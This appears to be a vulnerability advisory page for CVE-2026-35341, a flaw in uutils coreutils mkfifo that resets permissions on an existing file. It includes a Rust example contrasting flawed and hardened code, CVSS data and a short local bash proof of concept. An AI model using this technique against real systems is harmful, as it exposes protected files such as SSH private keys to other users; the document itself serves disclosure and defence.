Security Vulnerability Report
CVE-2026-35341 CVSS 7.1 HIGH

Published: 2026-04-22 17:16:36
Last Modified: 2026-04-24 19:05:55

Description

A vulnerability in uutils coreutils mkfifo allows for the unauthorized modification of permissions on existing files. When mkfifo fails to create a FIFO because a file already exists at the target path, it fails to terminate the operation for that path and continues to execute a follow-up set_permissions call. This results in the existing file's permissions being changed to the default mode (often 644 after umask), potentially exposing sensitive files such as SSH private keys to other users on the system.
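The control-flow error described above, shown next to a corrected flow. This is an added example, not code from the uutils project: the helper names (`create_fifo`, `make_fifo_flawed`, `make_fifo_hardened`, `mode_of`) are hypothetical, the sample file is constructed, and the FFI declaration assumes Linux, where `mode_t` is `u32`.

```rust
// Added model of the flaw, not uutils source. Assumes Linux (mode_t = u32), rustc 1.82+.
use std::os::unix::{ffi::OsStrExt, fs::PermissionsExt};
use std::{ffi::CString, fs, fs::Permissions, io, path::Path};

unsafe extern "C" {
    fn mkfifo(path: *const std::os::raw::c_char, mode: u32) -> i32;
}

/// Wrapper over mkfifo(3); fails with EEXIST when anything already exists at `path`.
fn create_fifo(path: &Path, mode: u32) -> io::Result<()> {
    let c_path = CString::new(path.as_os_str().as_bytes())?;
    let rc = unsafe { mkfifo(c_path.as_ptr(), mode) };
    if rc == 0 { Ok(()) } else { Err(io::Error::last_os_error()) }
}

/// Flawed flow: the creation error is reported, but the follow-up chmod still runs.
fn make_fifo_flawed(path: &Path, mode: u32) -> io::Result<()> {
    let created = create_fifo(path, mode);
    if let Err(e) = &created {
        eprintln!("mkfifo: cannot create fifo {}: {}", path.display(), e);
    }
    fs::set_permissions(path, Permissions::from_mode(mode))?; // hits the existing file
    created
}

/// Hardened flow: `?` returns on failure, so only a FIFO created here is chmod-ed.
fn make_fifo_hardened(path: &Path, mode: u32) -> io::Result<()> {
    create_fifo(path, mode)?;
    fs::set_permissions(path, Permissions::from_mode(mode))
}

/// Permission bits of `path` (0 if metadata cannot be read).
fn mode_of(path: &Path) -> u32 {
    fs::metadata(path).map(|m| m.permissions().mode() & 0o7777).unwrap_or(0)
}

fn main() -> io::Result<()> {
    // Constructed scenario: a 0600 file in a private scratch directory.
    let dir = std::env::temp_dir().join(format!("mkfifo-demo-{}", std::process::id()));
    fs::create_dir_all(&dir)?;
    let secret = dir.join("id_demo");
    fs::write(&secret, b"constructed sample\n")?;
    fs::set_permissions(&secret, Permissions::from_mode(0o600))?;
    let _ = make_fifo_hardened(&secret, 0o644);
    let after_hardened = mode_of(&secret);
    let _ = make_fifo_flawed(&secret, 0o644);
    println!("hardened: {:o}, flawed: {:o}", after_hardened, mode_of(&secret));
    fs::remove_dir_all(&dir)
}
```

Both functions return an error for the existing path; only the flawed one leaves the file's mode changed, which is why an exit status alone does not reveal the problem.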

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-35341: Permission modification via mkfifo

# 1. Create a sensitive file with restrictive permissions (e.g., SSH key)
touch /tmp/target_file
chmod 600 /tmp/target_file
echo "Initial permissions:"
ls -l /tmp/target_file

# 2. Execute the vulnerable mkfifo command on the existing file
# This simulates a user or script attempting to create a FIFO
mkfifo /tmp/target_file

# 3. Check the permissions after the command
echo "Permissions after mkfifo:"
ls -l /tmp/target_file

# Expected result on vulnerable version: Permissions change to 644 (or umask default)
# making the file readable by others/group.

References

https://github.com/uutils/coreutils/issues/10020 (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35341", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:36.060", "lastModified": "2026-04-24T19:05:55.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in uutils coreutils mkfifo allows for the unauthorized modification of permissions on existing files. When mkfifo fails to create a FIFO because a file already exists at the target path, it fails to terminate the operation for that path and continues to execute a follow-up set_permissions call. This results in the existing file's permissions being changed to the default mode (often 644 after umask), potentially exposing sensitive files such as SSH private keys to other users on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10020", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}